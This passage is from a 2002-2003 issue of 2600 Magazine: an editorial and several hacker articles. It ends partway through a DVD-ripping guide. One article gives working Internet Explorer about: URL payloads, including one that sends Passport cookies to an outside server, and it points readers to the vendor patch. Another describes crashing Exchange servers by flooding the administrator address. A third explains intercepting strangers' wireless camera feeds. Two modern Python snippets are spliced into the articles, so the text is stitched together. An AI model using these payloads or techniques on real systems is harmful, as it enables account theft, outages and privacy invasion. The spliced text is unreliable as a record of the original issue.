2600 Magazine
Volume Nineteen, Number Four
Winter 2002-2003, $5.00 US, $7.15 CAN

"Voice or no voice, the people can always be brought to the bidding of the leaders. That is easy. All you have to do is tell them they are being attacked, and denounce the peacemakers for lack of patriotism and exposing the country to danger. It works the same in any country." - Hermann Goering, Hitler's designated successor, before being sentenced to death at the Nuremberg trials.

Editor-In-Chief: Emmanuel Goldstein
Layout and Design: ShapeShifter
Cover Photo: Fur Harald & Erhard
Cover Design: Mike Essl
Office Manager: Tampruf
Writers: Bernie S., Billsf, Eric Corley, Dalai, John Drake, Paul Estev, Mr. French, Javaman, Joe630, Kingpin, Lucky225, Kevin Mitnick, mlc, The Prophet, David Ruderman, Seraf, Silent Switchman, Mr. Upsetter
Webmasters: Juintz, Kerry
Network Operations: mlc, Seraf
Broadcast Coordinators: Juintz, Pete, daRonin, Digital Mercenary, Monarch, w3rd, Gehenna
IRC Admins: Antipent, DaRonin, Digital Mercenary, Redhackt, Roadie, Setient, The Electronic Delinquent
Inspirational Music: Death in Vegas, Good Courage, Tom Petty, Monoman, Royal Trux, Holger Czukay, Space Robot Scientists
Shout Outs: Ed Hernstadt, LOcke, Tim Pritlove, Tina, Zapphire

2600 (ISSN 0749-3851) is published quarterly by 2600 Enterprises Inc., 7 Strong's Lane, Setauket, NY 11733. Second class postage permit paid at Setauket, New York.

POSTMASTER: Send address changes to 2600, P.O. Box 752, Middle Island, NY 11953-0752.

Copyright (c) 2002 2600 Enterprises, Inc. Yearly subscription: U.S. and Canada - $20 individual, $50 corporate (U.S. funds). Overseas - $30 individual, $65 corporate. Back issues available for 1984-2001 at $20 per year, $25 per year overseas. Individual issues available from 1988 on at $5 each, $6.25 each overseas.

ADDRESS ALL SUBSCRIPTION CORRESPONDENCE TO: 2600 Subscription Dept., P.O. Box 752, Middle Island, NY 11953-0752 (subs@2600.com).

FOR LETTERS AND ARTICLE SUBMISSIONS, WRITE TO:
2600 Editorial Dept., P.O. Box 99, Middle Island, NY 11953-0099 (letters@2600.com, articles@2600.com).

2600 Office Line: 631-751-2600
2600 FAX Line: 631-474-2677

Material

Positivity
Passport Hacking Revisited
Lazy Exchange Admins
Warspying
CD Media Data Destruction
How to Make a DVD Backup
Honeypots: Building the Better Hacker
DNS Redirection Stopped
More on Telemarketing
Cracking Voter Fraud
Linux on the Xbox
Removing Spyware and Adware
Exposing the Coinstar Network
A Dumpster Diving Treasure
DMCA vs. DMCRA
Letters
.ncsc.mil (144.51.x.x)
A Brief Introduction to Deepfreeze
Beating Download Manager Protection
DHCP is Your Friend!
Marketplace
Meetings

Positivity

In the fast paced culture that we seem to find ourselves caught in the middle of, it's very easy to get stuck in a default mood of euphoria or despair. Lately it seems that we've been despairing quite a bit. We're certainly not alone. While it's very important to not lose sight of the bad and ominous things that are happening in the world of technology and what it could do to people like us, nothing is gained if we lose our overall positive outlook. We certainly couldn't have kept on publishing for nearly twenty years if we didn't feel a strong sense of hope for the future. There will never be a shortage of negative issues to focus upon. Let's take a brief moment to look at the positive developments.

By the time you read this (and hopefully barring any last minute unfortunate circumstances), the excruciatingly long ordeal of Kevin Mitnick will have finally reached an end. January 20, 2003 was the date that Mitnick's supervised release came to an end - three years after his release from prison. That means that he will once again be able to use the Internet, travel without having to ask permission, and talk to anyone he wishes to without having to check to see if they've ever been convicted of a crime.
Most of us take these freedoms for granted so it's hard to even imagine what life must be like without them.

In these past three years, Mitnick has become a model for someone who can overcome adversity and triumph in the end. Despite five years of isolation and the aforementioned restrictive conditions upon his release, he refused to let the system defeat him. The authorities made it almost impossible for him to earn a living - insisting that he not be allowed anywhere near a computer and at one point suggesting that he pursue a career in fast food. Instead Mitnick landed a job at a major talk radio station and answered listener questions about technology. He had kept himself educated on all the technological advances, despite being incarcerated and forbidden from experimenting with them upon his release. More recently he had a book published on the intricacies of social engineering and went on a government-approved speaking tour to promote it. Throughout this, Mitnick found time to testify before a Senate subcommittee on the dangers of bad technology and uninformed people. He also provided key evidence in a case against Sprint who had the audacity to claim that their switches were unhackable.

It would have been easy to dwell on the negative in this case - and there certainly was no shortage of negativity. After all, Mitnick hadn't actually had a real day of freedom since 1988 meaning that when all is said and done, fifteen years will have gone by since this all started. And in all that time, there was never a charge filed against Mitnick of anything more substantial than making free phone calls and looking at source code that didn't belong to him. It was all an incredible waste of time.

But we get nowhere by letting our bitterness dictate how we live. We have everything to gain by continuing forward in our spirit of curiosity, education, and rebellion against conformity.
There's always a price to pay in order to take those steps and sometimes it's a heavy price. Dmitry Sklyarov spent time in an American prison and was unable to return to his native Russia for nearly six months - simply because he wrote a program that could be used in a way that violated the absurd Digital Millennium Copyright Act. It made no difference that he wrote the program in another country. Even Adobe, the company that originally pressed charges against Sklyarov, realized how ridiculous the whole thing was and tried to drop it. But it was too late and the American justice system went to work, eventually putting Sklyarov's company (Elcomsoft) on trial instead in exchange for his testimony. The authorities didn't count on the defendants putting on a strong fight and they didn't count on the massive show of support for Sklyarov.

There's a reason so few cases ever make it to a jury. People are rightfully terrified of the system and what it can do to them. It's ironic that it took someone from outside our country to stand up to the system and refuse to be intimidated. The trial took place in December and it only took the jury one day to rule in Sklyarov's and Elcomsoft's favor. Part of the DMCA stipulates that there has to be intent and this was something the jury was unable to find in this case. It doesn't address the overall stupidity of the law itself which means there will be more such cases. But it's a good sign and a significant step towards fixing the numerous problems caused by this horrible legislation. And most importantly, it's proof that determination and standing by one's convictions can ultimately lead to victory.

We have to also remember that there's a big world out there, one that doesn't always initially grasp the importance of the issues we value. It's easy to dismiss the general public as ignorant and pawns of the mass media. But, as in all things, the truth is never quite that simple.
The general public can get it, they do tend to value the things that we do, and they are most definitely not the enemy. The jury in the Elcomsoft case is living proof of this. The key is getting the message out.

Over the past year or so we've reported (along with many others) some of the really bad ideas that have been passed down from Capitol Hill as a "response" to terrorism - things like the Patriot Act, the Homeland Security color scheme, Operation TIPS, Total Information Awareness, etc. And while many of these things are still around, public awareness and public criticism has soared - and it's most definitely made a difference. People are taking more time to think these things through and more of them seem to be realizing that diminishing our freedoms really isn't going to accomplish a whole lot - other than diminishing our freedoms.

We've seen less talk of the alert status color coding system as it becomes mocked more than it's used. The TIPS system was heavily criticized for its Stasi-like system of informing on one's neighbors and having untrained civilians prowling around looking for potential thoughtcrime. And in true Orwellian style, all mention of TIPS was removed from the citizencorps.gov website where it had been prominently featured. It never happened.

The Total Information Awareness initiative is still very much with us. In their own words, TIA is meant to be a "total reinvention of technologies for storing and accessing information... although database size will no longer be measured in the traditional sense, the amounts of data that will need to be stored and accessed will be unprecedented, measured in petabytes." All of this will supposedly identify terrorists by having every conceivable bit of data easily available - from medical records to credit card purchases to Internet activity.
It doesn't take much to figure out that since they don't know who the terrorists are they will have to scrutinize all of us using these yet to be invented tools. It's clearly a sensitive topic for the folks at Defense Advanced Research Projects Agency (DARPA) who won't even reveal how much money is being allocated for this. While public pressure has yet to kill this beast, it's probably one of the few things that can. Public ridicule has already put an end to the TIA logo - a pyramid with an all seeing eye within it, apparently looking out over the globe. That also never happened.

As we go to press, yet another monitoring plan is being announced - this time one that makes Carnivore look friendly. It's part of a report entitled "The National Strategy to Secure Cyberspace" and it would require Internet Service Providers to participate in a centralized system that would theoretically allow the entire Internet to be monitored along with its users. The apparent frustration the government is feeling is summed up in this statement by one of the plan's coordinators: "We don't have anybody that is able to look at the entire picture. When something is happening, we don't know it's happening until it's too late." That is why the plan will fail. What they want is not only impossible but it flies in the face of everything the net represents. It would be the equivalent of wiretapping everyone at all times and we suspect most people just aren't going to go for that. Expect a backlash on this like nothing we've ever seen - if this scheme even makes it to spring.

Absurd and ridiculous as some of these plans may be, it's no excuse for not remaining vigilant and fighting those who endanger our freedom. Our victories may appear to be few and far between but they are quite significant. As is the fact that none of them could have been accomplished without a degree of organization and activism.
Whether the cause is ending the suffering of a single person, overturning a really bad law, or preserving everyone's right to privacy, reaching out to like-minded individuals and helping to make it a major issue is critical. It's gotten us this far and it will continue to be our strongest weapon.

Passport Hacking Revisited
by Chris Shiflett
chris@shiflett.org

This article is a follow-up article to "Passport Hacking," an article published in 18:3. Much of the information here is given under the assumption that you are familiar with the original article, so you should read it first. The original article was the first to reveal the security vulnerability in Microsoft Passport that prompted Microsoft to discontinue the Passport service for a short period of time while improvements were made. Other articles have appeared since the original, and it has been translated into several different languages. Unfortunately, the Passport mechanism possesses the same fundamental flaws that it did when the original article was written, though attempts have been made to mitigate these risks by imposing shorter timeout periods and requiring users to re-authenticate themselves more often.

Background

In "Passport Hacking," I introduced the Microsoft Passport mechanism and its inherent insecurity characterised by a complete dependence on cookies. Though cookies can be an adequate means of maintaining state in HTTP transactions, they are a poor choice for user authentication. Using cookies and URL variables, Microsoft communicates with Passport enabled sites through the user alone; there is no server to server communication. This is the fundamental design flaw that exposes Passport users to all of the security vulnerabilities that have been published to date.

The vulnerability used to compromise a Passport account in the original article involved using a malformed URL to expose a user's cookies to an unauthorized website.
This vulnerability only existed in Microsoft Internet Explorer versions 4.0 - 5.0, so this technique could not be used to compromise the Passport account of people using Internet Explorer versions 5.5 and 6.0. This article will demonstrate a technique that can be used to compromise the accounts of people who use these newer versions of Internet Explorer and will direct Internet Explorer users to the patch that will fix this vulnerability.

The Vulnerability

The vulnerability that exists in Internet Explorer versions 5.5 and 6.0 was originally alluded to on the web at http://www.solutions.fi/index.cgi/news_2001_11_08?lang=eng. In order for a website to gain unauthorized access to a user's cookies, an about: URL is used to deceive the web browser so that it executes client-side scripts in the local context with regards to security restrictions. Thus, a client-side script can potentially have as much access to your computer as you do.

An example of a URL exploiting this vulnerability is the following:

about://alert(This%20browser%20is%20vulnerable.)

A vulnerable browser will execute this client-side script, which will display the following alert box:

The significance of this is more extreme than this example illustrates. Because Internet Explorer executes this client-side script in the local context, this script has fewer security restrictions than client-side scripts that Internet Explorer believes to be sent from a remote web server. In addition, we can make a simple modification to our URL to make the domain checking mechanism in Internet Explorer mistake the URL for one from any domain we choose when it checks for cookie restrictions. For example:

about://www.passport.com/alert(document.cookie)</script>

If you are currently logged into Microsoft Passport when visiting this URL, an alert box similar to the following will appear:

[Screenshot: alert box displaying the user's Passport cookies]

All cookies that would be made available to a server-side script in the www.passport.com domain will appear in the alert box.

The significance of this example is that we now have a technique for executing a client-side script that has access to any cookies from any domain we choose. When combined with Passport's complete dependence on cookies, the danger should be clear.

The Compromise

The only step remaining for a complete compromise is to establish a method to get the cookies sent to the web server where they can be stored and subsequently retrieved by the imposter. To do this, I will use a URL similar to the last example, except that the script will redirect the user to a remote URL and append the cookie data in the query string of that URL:

about://www.passport.com/document.location='http://shiflett.org/demos/passport_hacking_revisited/?cookies='+document.cookie

The most dangerous characteristic of this technique is that no interaction from the user is required. Because of this characteristic, an attacker can redirect the user through many URLs that will compromise the cookies from many different domains rather than just one.
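
An added example, not part of the original article: because the technique depends on the browser being steered to an about: URL, a mail or web gateway in front of unpatched browsers can flag any about: URL other than about:blank in the HTML it relays. The sample HTML, the allow-list and all function names are constructed for illustration.

```python
import re
from html.parser import HTMLParser

# Attributes whose value the browser loads or navigates to.
URL_ATTRS = {"href", "src", "action", "background", "data"}
ALLOWED_ABOUT = {"about:blank"}   # assumed allow-list of harmless about: pages
# A quoted string in script text or an event handler that starts with about:
QUOTED_ABOUT = re.compile(r"""["'](\s*about:[^"']*)["']""", re.IGNORECASE)
# Target of <meta http-equiv="refresh" content="0; url=...">
META_URL = re.compile(r"""url\s*=\s*["']?([^"'>\s]+)""", re.IGNORECASE)


def normalize(url):
    """Strip whitespace and control characters and fold case, so that
    ' About:' or 'ABOUT:' cannot slip past the scheme check."""
    return re.sub(r"[\x00-\x20]+", "", url).lower()


def is_suspicious(url):
    u = normalize(url)
    return u.startswith("about:") and u not in ALLOWED_ABOUT


class AboutUrlFinder(HTMLParser):
    """Collects (location, url) for every non-allow-listed about: URL."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script = True
        for name, value in attrs:
            if not value:
                continue
            # The parser has already decoded entities such as &#97; here.
            if name in URL_ATTRS:
                candidates = [value]
            elif tag == "meta" and name == "content":
                candidates = META_URL.findall(value)
            elif name.startswith("on"):          # onclick, onload, ...
                candidates = QUOTED_ABOUT.findall(value)
            else:
                continue
            for url in candidates:
                if is_suspicious(url):
                    self.findings.append((f"<{tag} {name}>", normalize(url)))

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # Redirects written as location = 'about:...' inside a script block.
        if self._in_script:
            for url in QUOTED_ABOUT.findall(data):
                if is_suspicious(url):
                    self.findings.append(("<script>", normalize(url)))


def find_about_urls(html):
    finder = AboutUrlFinder()
    finder.feed(html)
    finder.close()
    return finder.findings


# Constructed sample page: two harmless links, four ways of reaching about:
SAMPLE_HTML = """
<a href="about:blank">empty page</a>
<a href="http://www.example.test/">normal link</a>
<iframe src="ABOUT://www.example.test/payload"></iframe>
<a href="&#97;bout://www.example.test/payload">entity-encoded scheme</a>
<meta http-equiv="refresh" content="0; url=about://www.example.test/payload">
<script>window.location = 'about://www.example.test/payload';</script>
"""

if __name__ == "__main__":
    for location, url in find_about_urls(SAMPLE_HTML):
        print(location, url)
```
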
This characteristic makes Internet Explorer versions 5.5 and 6.0 even more dangerous than the previous versions with regards to cookies. In addition, this compromise is even easier to achieve than the original, requiring very little expertise on the part of the attacker.

Once the cookies are stored on the web server, a technique must be established to store these cookies on an imposter's web browser. Many methods can be utilized for this step, and the original article gives sample code for one. This final step will complete the impersonation, and the imposter can then pose as the user whose account was compromised by visiting any Passport enabled website.

Summary

Due to the fundamental flaws in the design of the Passport mechanism, I do not recommend that it be used in conjunction with sensitive data or personal information. The convenience is not worth the security risk, and it is likely that this article does not represent the last of such risks. As I mentioned earlier, the mechanism used is fundamentally flawed; articles such as this merely describe techniques that can be used to exploit these flaws.

For those who are currently using a vulnerable Web browser and wish to continue to use it, visit http://www.microsoft.com/windows/ie/downloads/critical/q313675/default.asp and install the security patch. There are many websites that utilize cookies in order to maintain state, and using a vulnerable browser places you at risk of many attacks similar to the one described here.

An interactive demonstration of the technique described in this article is located at http://shiflett.org/demos/passport_hacking_revisited/.

Lazy Exchange Admins
by ddShelby

Security in Exchange is or should be a concern for many admins out there because of its fairly widespread use in many small to mid sized organizations. It does have some worthy features but also has some serious security concerns (like everything from Redmond) that need to be attended to.
And that is the purpose of this article. To inform and educate those who read it and maybe expose a few Exchange admins to some information they might find useful. So let's get started.

As an admin you have the ability to create an account during install that is not the same as the default administrator account in the OS. But not many elect to do this because of the log on/log off hassle to administer the OS along with a separate account to administer Exchange. If a separate Exchange admin account was not created at the time of install (which is almost always the case) and it's an NT4 server, then it's almost guaranteed that administrator@whoever.com exists, because you can't rename the administrator account for the OS in NT. If it's a Win2K server with Exchange 5.5 or Exchange 2000, the same is also true. But with the ability to rename the default administrator account in the OS, there is a chance it was renamed at the time of setup. In both cases (assuming default) the administrator account for the OS has an SMTP address that follows the convention: administrator@whoever.com. If the OS is NT4, then it's a shoe-in unless the SMTP settings were edited by the admin. This is the problem.

Some Basics of Exchange

The standard version of Exchange 5.5 and 2000 both have a limit on the size of either the public or private database (priv.edb and pub.edb). They cannot exceed 16 GB each. The Enterprise versions of 5.5 and 2000 are not limited to anything except available drive space. With server drive space still somewhat costly (assuming the server runs with some form of SCSI and raid), reaching this limit is not difficult for most organizations of a dozen users or more. Two reasons why it's so easy to get to 16 GB or reach the server's available drive space limit is the disregard of most admins towards limiting users' mailbox size and the users' habit of using Outlook deleted items folder as an archive folder.
The admin has the ability to force notification limits on users' mailbox size on either a global or per user basis. The spam issue is also partly to blame since everyone just deletes it, but the mentality of using the deleted items folder as an archive comes back to haunt again, only adding to the total size of the database. So the 16 GB limit is in many cases closer than one might think. This is especially true if none of the limits were ever put in place and the server has been in use for a year or longer. It's made worse by the fact that small organizations don't need a monster server to run Exchange 5.5 and with the hardware requirements set forth by Win2K server, many have elected to stay with NT4 and Exchange 5.5. An NT4/Exchange 5.5 server could easily serve a dozen users on a P200 with 32 megs of ram and a single 10 GB IDE drive. Don't laugh. I've seen it.

Getting back to the point. Any Exchange server is vulnerable to getting swamped and not by some new hack. You can crash Exchange by simply knowing any e-mail address of any recipient on any given server. The ugly part is this could potentially happen over days or weeks or even months before it's even noticed or it's just too late. Since Exchange by default has an account assigned to the Administrator of the OS, an SMTP address exists for it. If you assume that the administrator account is not actually in use but still exists, one could theoretically swamp an Exchange server by sending numerous e-mails with large bogus attachments. Or if the sender's ISP does not impose limits on the size of outgoing mail, one large attachment could do the same. To use any general user's address is slightly more difficult since users usually read their mail. But the administrator account is almost never used since admins set up an address for themselves and use it instead.
As drive space comes close to zero available, the Exchange service that handles SMTP (IMS) shuts down and all incoming mail is rejected. But since the information store service (the database) usually continues to run, and if the admin is smart enough to check the private information store listed in Exchange Admin, he would see the tremendous size of the mailbox and then just log into it and clean it out. An easy fix for this is to just edit the SMTP address of the administrator account to something obscure. In addition, you could disable any unused SMTP addresses to help prevent getting swamped. A periodic check of available drive space or the size of the .edb files would be useful, but seems to escape many admins.

But Wait, It Gets Worse

As opposed to reaching the drive space limit, if the 16GB database limit is reached instead, it becomes a whole different story. If the Enterprise version is installed before the 16 GB limit is reached, then disaster can be avoided. However, if the 16GB limit is reached before upgrading, the information store service is shut down automatically and can't be restarted. The result from this is all incoming SMTP messages are rejected at the server and no user can log in to their respective mailbox. And the admin can't get the service started to log in and delete the offending content. As an admin you can purchase the Enterprise edition for two grand, but installing it on top of the standard edition doesn't quite solve the problem. All is not lost - there is a workaround for this listed in the Knowledge Base that explains how to copy the database into the active folder (usually exchsrvr\MDBDATA) after you install the Enterprise version. But if the database has reached the 16GB limit you'll be copying for a while. If the admin is savvy enough, he could play the game of just renaming folders instead of copying.
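
The periodic check the article recommends, as an added example rather than code from the original article: it grades each database file against the 16 GB standard-edition cap, checks free space on the drive that holds it, and projects how many days remain at the observed growth rate. The thresholds, the function names and the linear projection are assumptions; the free-space-versus-size check reflects the article's later remark that a defrag needs free space at least equal to the database size.

```python
import os
import shutil

GB = 1024 ** 3
STANDARD_LIMIT = 16 * GB   # per-database cap of the standard edition (from the article)


def assess_database(size, free, limit=STANDARD_LIMIT,
                    warn_at=0.80, crit_at=0.95, min_free=1 * GB):
    """Grade one database file; returns a list of (severity, message).

    size -- current size of the .edb file in bytes
    free -- free bytes on the drive that holds it
    warn_at, crit_at and min_free are assumed thresholds; tune them per site.
    """
    findings = []
    used = size / limit
    if used >= crit_at:
        findings.append(("CRITICAL", f"database at {used:.0%} of its size cap"))
    elif used >= warn_at:
        findings.append(("WARNING", f"database at {used:.0%} of its size cap"))
    # A nearly full drive is the other failure mode: inbound SMTP stops.
    if free < min_free:
        findings.append(("CRITICAL", "drive almost full, inbound mail will be rejected"))
    # Recovery headroom: a defrag needs free space >= the database size.
    if free < size:
        findings.append(("WARNING", "not enough free space to defragment the database"))
    return findings


def days_until_limit(samples, limit=STANDARD_LIMIT):
    """Linear projection from (unix_time, size_bytes) samples, oldest first.

    Returns None when there are fewer than two samples or no growth,
    which also covers a slow flood that has not started yet.
    """
    if len(samples) < 2:
        return None
    (t0, s0), (t1, s1) = samples[0], samples[-1]
    if t1 <= t0 or s1 <= s0:
        return None
    rate = (s1 - s0) / (t1 - t0)              # bytes per second
    return max(0.0, (limit - s1) / rate / 86400)


def check_paths(paths, limit=STANDARD_LIMIT, **thresholds):
    """Measure real files (e.g. priv.edb and pub.edb) and return {path: findings}."""
    report = {}
    for path in paths:
        size = os.path.getsize(path)
        free = shutil.disk_usage(os.path.dirname(os.path.abspath(path))).free
        report[path] = assess_database(size, free, limit, **thresholds)
    return report


if __name__ == "__main__":
    # Constructed readings: a 15.5 GB private store on a drive with 10 GB free.
    for severity, message in assess_database(15.5 * GB, 10 * GB):
        print(severity, message)
    # Constructed history: 10 GB ten days ago, 12 GB now.
    print(days_until_limit([(0, 10 * GB), (10 * 86400, 12 * GB)]), "days left")
```

Run it from a scheduled job with the full paths to the two database files and alert on anything it returns.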
But with so many Windows admins who changed careers from grocery bagging, it's unlikely they're smart enough to figure that out. And as the Knowledge Base article suggests to copy the edb file, it seems to me that at least one employee at Redmond didn't figure it out either. Admins could also defrag the database with a utility included with Exchange in the exchsrvr\bin folder called eseutil (both 5.5 and 2000). This would buy enough time to delete enough and recover. But if the SMTP service IMS is running and email is still incoming, it could be a race to delete before it reaches its limit again. In addition, the defrag needs drive space equal to or greater than the size of the database. But this inevitably brings me back to admins who were bagging groceries six months ago. Another safety net would be to implement a second MX record for the domain with a higher cost route, so any incoming mail rejected by Exchange would be collected on another machine. Then with ETRN you could dequeue the mail from the higher cost server and no mail would be lost.

Discovery of a Server

Regardless of the presence of a firewall, by using one of the many port scanners an Exchange server is easy to find. I use SuperScan on my Win2K laptop but many others work just the same. A scan of a range of addresses to port 25 will eventually reveal an open port. If it's an Exchange server it will identify itself as such, as well as the version and build. For example,

25 SMTP 220 server.domain.whoever.com ESMTP Server (Microsoft Exchange Internet Mail Service 5.5.2653.13) ready.

In this example it's a 5.5 SP4 server. With that, the domain is known, the administrator address can be correctly assumed 95 percent of the time or better, and the rest is up to any delinquent with nothing better to do. Or at some point some worm will make its way to the Internet and play this same game, only faster.

Warspying
by Particle Bored

Are you having a hard time figuring out what to do with your X10 camera now that you are done playing practical jokes on friends and family? For less than $50 you can put the X10 receiver in your car and begin screwing around with complete strangers.

Standard disclaimer: I don't accept responsibility for my own actions, so I definitely won't assume responsibility for yours. If TVs in vehicles are illegal in your area, or should you get decapitated from a TV flying around in your car it's your problem.

Here is what you will need to get started:

Jensen J53-RW TV/Monitor (only $25 at Target)
X10 Receiver
DC Power cord with "L" connector
DC Power "Y" adapter
Velcro

The Jensen TV is a 5" black and white portable monitor that has both video and audio RCA input jacks. It can run on AC, DC, or batteries and comes with a car lighter adapter.

The X10 receiver is intended for indoor use, so it is shipped with only an AC adapter. If you look at the output of the adapter though, you'll see that it is 12 volt DC which means you can run the receiver straight off your car battery. Since I wanted the system to be easily removed, I decided to power it with another lighter cord (the one with the "L" connector). It is positive-tipped, so make sure you have the polarity right.

Now plug everything together. Nearly all of the connectors can only go in one place. The RCA connectors are fully color-coded, so if you can't figure out how to do it, fire up the IM client on your Mac and ask your grandmother.

I mounted the monitor and receiver on my dashboard with Velcro. If this method obstructs your view you can put the monitor on the passenger seat or floor. Make sure you don't mount anything where it might hinder the deployment of an airbag.

Now hit the road. I found my first camera within 60 seconds on the very next block. I typically find one about every 15 minutes.

In closing here are a few things I learned the first day:

- Don't worry about the channel switch on your receiver - most folks leave it on the default channel "A".
- The transmitters have a range of only around 100 yards so you will need to be somewhat close to your target.
- You'll tend to get audio before video, so you'll know you are onto something when the static on the TV goes away. Keep your eyes on the road and pull over when you start receiving audio.
- You'll notice several definite patterns appear on the monitor at times. For example, I have seen both narrow and wide horizontal lines. If you identify the devices that cause them, write to the Letters section of 2600 and let everyone know. I would bet one of them is a 2.4 GHz cordless phone....
- I was able to get perfect cable TV twice. Is someone using wireless for extensions or something?

CD Media Data Destruction
by Gr3y t0qu3
greytoque@paladindesign.ca

While we as hackers have an obsession with freedom of speech we also have an obsession with data destruction. I wrote this article to quell my - and many other peoples' - interest in the latter specifically dealing with CDs. I've heard nuking the CD in a microwave is not 100 percent successful in destroying the data. It was stated in "How to Hack From a Ram Disk" in 18:4. I tried to find information on this topic but there really is none out there, so I decided to take this task on for myself.

When I started doing research for this article I realized that there are many ways to destroy CD-ROM, CD-R, and CD-RW media.
The first things I found were targeted towards commercial uses. I found products that used "micro indentation" to "reliably penetrate the data surface of target media, destroying any readable data" and as a side effect the CD went from round to an oval shape. Sure sounds good, right? Well if you have $5k to waste it's great. Then there's some that grind away the recording surface. The one I found cost $1GL. Both of these solutions are not priced for the average person. Simply deleting the files from a CD-ROM/R/RW won't work either. There are plenty of software suites out there for recovering data from them. I found one for $39.95 and there was even a free 30 day trial. So if you have a low tech adversary you're hiding the data from even that wouldn't work. The software can also recover data from quick formatted CD-RWs, where the data is left there just to be overwritten at a later time (the same concept as recovering deleted data from your hard drive - the reference to the data in the drive table is removed, the data isn't touched).

Let's get to the main point of the article: Does data destruction with a microwave really work?

First, to understand if the microwave is an effective way to destroy data you need to understand how CDs are made. All three types of CD (CD-ROM, CD-R, and CD-RW) are different. In the next little while I'm going to look at the three different types and explore if it will work for each.

CD-ROMs are exactly what they say, CDs with Read Only Memory. Most of a CD-ROM consists of a piece of clear polycarbonate plastic. During manufacturing, this plastic is impressed with microscopic pits arranged as a single, continuous, extremely long spiral track of data. Once the plastic is formed, a thin, reflective aluminum layer is "sputtered" onto the disc, covering the bumps. Then a thin acrylic layer is sprayed over the aluminum to protect it.
A CD reader reads CD-ROMs by sending out a laser beam that passes through the plastic layer, reflects off the aluminum layer and hits a device that detects changes in the amount of light it receives. The bumps, commonly called pits because if you could see them they would look like pits from the label side of the CD-ROM, reflect the light differently from the lands. The lands are the rest of the aluminum layer.

The aluminum layer is very, very thin. When you nuke a disk, large currents flow through the aluminum. These currents produce enough heat to vaporize the aluminum. You then see a very small lightning storm as electric arcs go through the vaporized aluminum. There will be many paths left etched through the aluminum after this. So with the aluminum vaporized a CD player won't be able to read the data anymore. Because of the extreme heat of the aluminum the plastic above and below the aluminum would also be damaged. I'd be guessing the aluminum paths left would be horribly warped. Just think about what would happen to you if you were subjected to that kind of heat. I'm fairly confident that this is a 100 percent secure method of data destruction as you would not be able to somehow inject a new reflective material and fill up the microscopic pits as they would be damaged. Sure, that's all great if you happen to have a Windoze CD sitting around that you don't want anyone to have to experience the horror of.

So what about CD-Rs? Instead of there being pits imprinted into the plastic of a CD-R there is an extra layer. This extra layer is a greenish dye right below the reflective material. A write laser heats up the dye layer enough to make it opaque. The read laser in a CD player senses the difference between clear dye and opaque dye the same way it senses bumps - it picks up on the difference in reflectivity. So when you nuke a CD-R the gold/aluminum layer vaporizes.
If that is the only effect then it would be possible to cut the CD where the aluminum/gold layer used to be and then put a reflective substance on top of it and stick it in a CD player. This would require very, very fine instruments as a CD is only 1.2mm thick. But the main variable is how hot the aluminum/gold is when it vaporizes and if it is hot enough to change the state the dye is in - from transparent to making the whole disk opaque to a reader. From looking at a few nuked CD-Rs I think that most data would be lost. On a blank CD that is nuked, there is a "loose swirly" pattern of the different shades (written and unwritten), effectively making true data impossible to find. On CDs with data it would do the same and so a lot of data would be lost. So on CD-Rs it's not really a guaranteed process of having your data fully and completely removed. Although if you're up against someone like the NSA/FBI/CIA who are going to all the trouble to find that information you have far bigger problems on your hands and I'm guessing you'd never see a public court.

CD-RWs are a little different again. Instead of the dye layer there's a phase-change compound composed of silver, indium, antimony, and tellurium. This recording layer is sandwiched between dielectric layers that draw excess heat from the phase-change layer during the writing process. A CD-RW drive has to use three different lasers: a read laser, a write laser, and an erase laser. To write to a CD a laser beam heats areas of the phase-change material above the melting temperature (500-700C), so all the atoms in this area can move rapidly into a liquid state. Then, if cooled quickly enough, the random liquid state does not reorder its atoms back into a crystalline state. To erase, a laser heats the same area to above the crystallization point - 200C - and then lets it cool quickly so that the atoms reorder themselves.
The read laser is much less powerful. The dielectric layers that are above and below the phase-change compound are by definition "poor conductors of electricity and will sustain the force of an electric field passing through it." So that would not allow much of the electric field caused by the microwave to be able to reach the phase-change compound layer where the data is stored. But then again, it's not made to stand the bombardment by a microwave. Also, it's a heat insulator so the temperatures caused by the reflective layer vaporizing will not affect it too much either. So again with advanced tools it might be possible to remove the damaged material and put on a new reflective layer.

Unfortunately I have no way to find this out for sure. I would like someone to write a follow-up to this article with actual lab data (University). As you can see it is not known if microwaving is a 100 percent secure form of data removal for CD-Rs and RWs. It is one of the most secure options there is. It should hold up unless you have POTUS (President of the United States) really pissed off at you. Local police agencies and the FBI probably do not have the technology to retrieve data from a nuked CD. Most of the people who argue that this is possible also argue that "they" would just go back in time to before you nuked the CD....

Greetz: Spiffy and Syphet.

[Image: check from Bankruptcy Services, agent for PSINet Liquidating LLC, drawn on HSBC Bank USA, New York, NY]

Some of you may remember a problem we had with a company called PSI back in 1995. To put it briefly, we were misled into signing a contract for ISDN service that didn't exist and almost lost a sizable down payment. Once we publicized the situation and stuck audio evidence of their deceit on our website, we got a refund in full.
More recently, PSI went bankrupt (and no, we don't feel guilty). For some reason we wound up on their list of creditors and eventually received this check. They also managed to rename us from 2600 to 5393. We don't really understand any of it but if this is how they ran things, we may understand how they went bust.

How to Make a DVD Backup
by Maniac Dan

Disclaimer: Copying DVDs to sell or DVDs you do not own is illegal and immoral and should not be done.

After reading the letter in 19:3 questioning the methods of DVD copying, I decided to write an article detailing exactly how it's done, or at least get it close enough for normal people to make backups of their DVDs. I've only tested this on Region 1 NTSC DVDs. Readers in other countries should find a guide for their region and video format. Sorry. I also find it useful to bring a stack of VCDs with me on trips, since my laptop doesn't have DVD capabilities. Anyway, I'm going to detail the methods for ripping to either AVI, VCD, or SVCD. Some of the steps are the same, but for steps that are different, I will assign them both a number and a letter, so 3(A) is the AVI instructions, 3(V) is VCD, and 3(S) is SVCD. Any step that applies to all three formats will have no letters.

In order to rip to AVI, you need Smartripper and DVD2AVI. To rip to VCD and SVCD, you need these files plus TMpgEnc and BBMpeg. Also, for the ripping process to work on XP or some versions of 2K, you need a valid aspi layer driver. To burn your CDs you need software that supports VCD and SVCD burning, like Nero. (Links for these programs are at the end of this article.) Now for the steps:

1: Insert the DVD and play it for a few seconds in a software DVD player. This will "unlock" the DVD and allow you to rip it using Smartripper.

2: Load up Smartripper and take a look around. At the bottom of the screen is a "Target" box which needs to be filled in with a valid folder name.
